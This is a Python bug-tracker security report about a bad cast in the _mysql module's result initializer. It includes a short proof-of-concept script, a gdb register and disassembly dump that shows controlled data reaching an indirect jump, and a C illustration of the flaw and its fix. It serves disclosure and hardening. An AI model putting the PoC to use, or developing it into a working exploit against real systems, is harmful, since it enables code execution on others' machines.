[issue29150] Bad cast@ _mysql_ResultObject_Initialize() result in code execution

zeroinside report at bugs.python.org
Wed Jan 4 06:26:34 EST 2017


New submission from zeroinside:

Hello.
I found a vulnerability in the _mysql module.
PoC below:
#!/usr/bin/python2.7
import _mysql
RDX = 0x66666666        # second argument; this value shows up in RDX in the register dump below
payload = "A" * 2048    # a str is passed where _mysql.result expects a connection object
_mysql.result(payload, RDX)


It's an exploitable bug; I'm working on an exploit.
(gdb) run mysql.py 
Starting program: /usr/bin/python2.7 mysql.py
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/usr/lib/libthread_db.so.1".

Program received signal SIGSEGV, Segmentation fault.
0x00007ffff38e7f3c in mysql_use_result () from /usr/lib/libmysqlclient.so.18
(gdb) info reg
rax            0x4141414141414141       4702111234474983745
rbx            0x7ffff7e91b90   140737352637328
rcx            0x0      0
rdx            0x66666666       1717986918
rsi            0x7ffff7eb1ec0   140737352769216
rdi            0x5555557f9890   93824995006608
rbp            0x7fffffffe120   0x7fffffffe120
rsp            0x7fffffffe0a8   0x7fffffffe0a8
r8             0x7fffffffdd00   140737488346368
r9             0x7fffffffdd80   140737488346496
r10            0x5555557824f0   93824994518256
r11            0x2      2
r12            0x5555557560a0   93824994336928
r13            0x0      0
r14            0x7ffff7e939c7   140737352645063
r15            0x7ffff7e91b90   140737352637328
rip            0x7ffff38e7f3c   0x7ffff38e7f3c <mysql_use_result+12>
eflags         0x10206  [ PF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) disas $rip
Dump of assembler code for function mysql_use_result:
   0x00007ffff38e7f30 <+0>:     push   %rbp
   0x00007ffff38e7f31 <+1>:     mov    0x4d0(%rdi),%rax
   0x00007ffff38e7f38 <+8>:     mov    %rsp,%rbp
   0x00007ffff38e7f3b <+11>:    pop    %rbp
=> 0x00007ffff38e7f3c <+12>:    mov    0x18(%rax),%rax
   0x00007ffff38e7f40 <+16>:    jmpq   *%rax
End of assembler dump.
(gdb)

----------
components: Library (Lib)
messages: 284629
nosy: zeroinside
priority: normal
severity: normal
status: open
title: Bad cast@ _mysql_ResultObject_Initialize() result in code execution
type: security
versions: Python 2.7

_______________________________________
Python tracker <report at bugs.python.org>
<http://bugs.python.org/issue29150>
_______________________________________
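The crash comes from a pointer read through an argument that was never verified to be a connection object. The following is an added illustration, not MySQLdb's or CPython's code: a stripped-down model of the object layout (all type and field names are hypothetical) showing the unchecked cast beside its checked form.

```c
/* Added illustration, not MySQLdb's code: a minimal model of a C extension
 * that receives a generic object and must decide whether it is a
 * "connection" before treating it as one. All names are hypothetical. */
#include <stdint.h>
#include <string.h>

typedef struct TypeObject { const char *name; } TypeObject;
typedef struct Object { TypeObject *type; } Object;          /* common header */
typedef struct Connection { Object base; void *mysql; } Connection;
typedef struct Str { Object base; char data[64]; } Str;      /* str-like body */

static TypeObject ConnectionType = { "connection" };
static TypeObject StrType = { "str" };

/* Vulnerable pattern: the argument is cast to Connection* without a type
 * check, so whatever bytes sit at the handle's offset are used as a pointer.
 * Returns the pointer value it would hand on (as an integer, for inspection). */
uintptr_t result_init_unchecked(Object *arg) {
    Connection *conn = (Connection *)arg;     /* bad cast */
    return (uintptr_t)conn->mysql;            /* reads str data as a pointer */
}

/* Hardened form: refuse anything that is not a Connection. This is what
 * PyArg_ParseTuple's "O!" format (or PyObject_TypeCheck) achieves in a real
 * CPython extension. Returns 0 on success, -1 where a TypeError is due. */
int result_init_checked(Object *arg, uintptr_t *handle_out) {
    if (arg == NULL || arg->type != &ConnectionType)
        return -1;                             /* raise TypeError instead */
    *handle_out = (uintptr_t)((Connection *)arg)->mysql;
    return 0;
}

/* Constructed str-like object filled with 'A' bytes, analogous to the
 * report's "A"*2048 payload. */
Str make_str_payload(void) {
    Str s;
    s.base.type = &StrType;
    memset(s.data, 'A', sizeof s.data);
    return s;
}
```

With the str payload, the unchecked path yields a "pointer" made entirely of 0x41 bytes, matching the RAX value in the register dump; the checked path rejects the argument before any dereference.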